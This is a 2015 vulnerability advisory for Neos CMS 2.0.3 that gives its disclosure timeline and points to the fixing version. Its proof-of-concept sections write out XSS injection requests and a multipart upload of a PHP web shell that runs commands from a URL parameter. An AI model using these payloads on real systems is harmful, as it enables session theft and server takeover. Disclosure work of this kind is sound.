######################################################################
# Exploit Title: Neos/Flow multiple vulnerabilities
# Date: 24/11/2015
# Author: Mickael Dorigny @ Synetis
# Vendor or Software Link: https://www.neos.io/
# Version: <= 2.0.3
# Category: Multiple Vulnerabilities
# Tested on : Neos 2.0.3
######################################################################
Neos/Flow Content Application Platform description :
======================================================================
Neos is an open source Content Application Platform based on its own PHP framework (Flow). A set of core Content Management features is resting within a larger context that allows to build a customized experience for users.
Vulnerability description :
======================================================================
Neos 2.0.3 is vulnerable to multiple vulnerabilities like :
- Reflected XSS (without authentication)
- multiple Stored-XSS (with authentication as simple user, editor or administrateor)
- Arbitrary File Upload(Editor and Administrator)
Neos is developed in PHP with the Flow PHP Framework which as also been updated.
Proof of Concept n°1 - Reflected Cross-Site Scripting (SXSS) with editor or administrator authentication :
================================================================================================
An user with "Editor" or "Administrator" permissions can modify an article or page content in a way to make execution of JavaScript instructions.
PoC :
An attacker with "Editor" or "Administrator" permissions have to inject JavaScript instruvctions in the edited pagecontent in the modification panel "In-Place" or "Raw" mode. Then, another user reviewing this same content in "Print" or "Desktop" preview mode will executes the JavaScript instruction.
Through this vulnerability, an attacker could tamper with page rendering, redirect victim to fake login page, or capture users credentials such cookies. Moreover, an user with "Editor" privileges can use this vulnerability to steal Administrator cookie to lead privileges escalation in Neos.
Proof of Concept n°2 - Reflected Cross-Site Scripting (SXSS) with user authentication :
================================================================================================
An user who can modify his profile informations "Title", "First Name", "Last name", "Middle Name", "Other Name" can inject Javascript instructions in those parameters.
Once set up, an Administrator who wants to edit this user account and go to "Edit" of this account will executes JavaScript instructions.
PoC :
POST http://webserver/neos/user/usersettings/update HTTP/1.1
Referer: http://webserver/neos/user/usersettings/edit.html
[Vulnerable form input via post data]
[user][title]=<script>alert("SXSS01")</script>
[user][name][firstName]=<script>alert("SXSS02")</script>
[user][name][middleName]=<script>alert("SXSS03")</script>
[user][name][lastName]=<script>alert("SXSS04")</script>
[user][name][otherName]=<script>alert("SXSS05")</script>
Through this vulnerability, an attacker could tamper with page rendering, redirect victims to fake login page, or capture users credentials such cookies. Moreover, an user with "Editor" privileges can use this vulnerbility to steal Administrator cookie to lead privileges escalation Neos.
Proof of Concept n°3 - Reflected Cross-Site Scripting (RXSS) without authentication :
================================================================================================
A non-persitent XSS (RXSS) in GET parameter passed during user creation is available in Neos 2.0.3.
When the "newaccount" value is modified for the "--typo3_neosdemotypo3org-registration[@action]" parameter, an error message is displayed. This error message writes back the mispelled value. Then we can inject JavaScript instructions in the "--typo3_neosdemotypo3org-registration[@action]" paramater.
PoC :
http://webserver/neos/en/try-me.html?--typo3_neosdemotypo3org-registration[@package]=typo3.neosdemotypo3org&--typo3_neosdemotypo3org-registration[@controller]=registration&--typo3_neosdemotypo3org-registration[@action]=<script>alert("RXSS")</script>newaccountmispelled
In some implementations of Neos, error message can be hidden via <!-- --> HTML code. In this context, this PoC works, we just have to close the HTML comment in our injection :
http://webserver/neos/en/try-me.html?--typo3_neosdemotypo3org-registration[@package]=typo3.neosdemotypo3org&--typo3_neosdemotypo3org-registration[@controller]=registration&--typo3_neosdemotypo3org-registration[@action]=--><script>alert("RXSS")</script>newaccountmispelled
Through this vulnerability, an attacker could tamper with page rendering, redirect victim to fake login page, or capture users credentials such cookies.
Proof of Concept n°4 - Arbitrary File Upload :
================================================================================================
With an user account with "Editor" or "Administrator", it is possible to upload arbitrary file.
Through this vulnerability, an attacker could upload other type than image file like PHP script. A PHP script can give additional action possibility like executing instructions on the server side.
PoC :
POST http://webserver/neos/management/media/upload?__csrfToken=xxxxxxxxxe3
Type Mime[text/html]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0]
Referer[http://webserver/neos/management/media/]
Content-Type[multipart/form-data; boundary=---------------------------32007199347844]
Données POST:
POST_DATA[-----------------------------32007199347844
Content-Disposition: form-data; name="name"
file.php
-----------------------------32007199347844
Content-Disposition: form-data; name="moduleArguments[asset][resource]"; filename="file.php"
Content-Type: application/octet-stream
<?php
$output = shell_exec($_GET['cmd']);
echo "<pre>$output</pre>";
?>
-----------------------------32007199347844--
]
This arbitrary file can then be retrieved through the "Media" panel which gives the full URL to the selected file.
Screenshots :
======================================================================
- http://www.information-security.fr/wp-content/uploads/2015/11/neos-2-0-3-multiple-vulnerabilities-03.jpg
- http://www.information-security.fr/wp-content/uploads/2015/11/neos-2-0-3-multiple-vulnerabilities-05.jpg
- http://www.information-security.fr/wp-content/uploads/2015/11/neos-2-0-3-multiple-vulnerabilities-08.jpg
- http://www.information-security.fr/wp-content/uploads/2015/11/neos-2-0-3-multiple-vulnerabilities-09.jpg
- http://www.information-security.fr/wp-content/uploads/2015/11/neos-2-0-3-multiple-vulnerabilities-12.jpg
- http://www.information-security.fr/wp-content/uploads/2015/11/neos-2-0-3-multiple-vulnerabilities-16.jpg
Solution:
======================================================================
- I suggest to upgrade your Neos installation to the next version (2.0.4) : https://github.com/neos/neos-development-collection/releases/tag/2.0.4
Additional resources :
======================================================================
- Article https://information-security.fr/en/sxss-rxss-arbitrary-file-upload-neos-cms-version-2-0-3
- Video Poc : https://www.youtube.com/watch?v=j0Mli_EQpQo
- Official security fixes for Neos / Flow: https://www.neos.io/news/neos-flow-security-fixes.html
Report timeline :
======================================================================
2015-11-09 : Informed Vendor about issues
2015-11-09 : Vendor response and investigation
2015-11-11 : Vendor feedback concerning new version
2015-11-24 : New version of the product released
2015-11-24 : Public Advisory released
Credits :
======================================================================
88888888
88 888 88 88
888 88 88
788 Z88 88 88.888888 8888888 888888 88 8888888.
888888. 88 88 888 Z88 88 88 88 88 88 88
8888888 88 88 88 88 88 88 88 88 888
888 88 88 88 88 88888888888 88 88 888888
88 88 88 8. 88 88 88 88 88 888
888 ,88 8I88 88 88 88 88 88 88 .88 .88
?8888888888. 888 88 88 88888888 8888 88 =88888888
888. 88
88 www.synetis.com
8888 Consulting firm in management and information security
Mickael Dorigny - Security Consultant @ Synetis | Information-Security.fr
--
SYNETIS
CONTACT: www.synetis.com | www.information-security.fr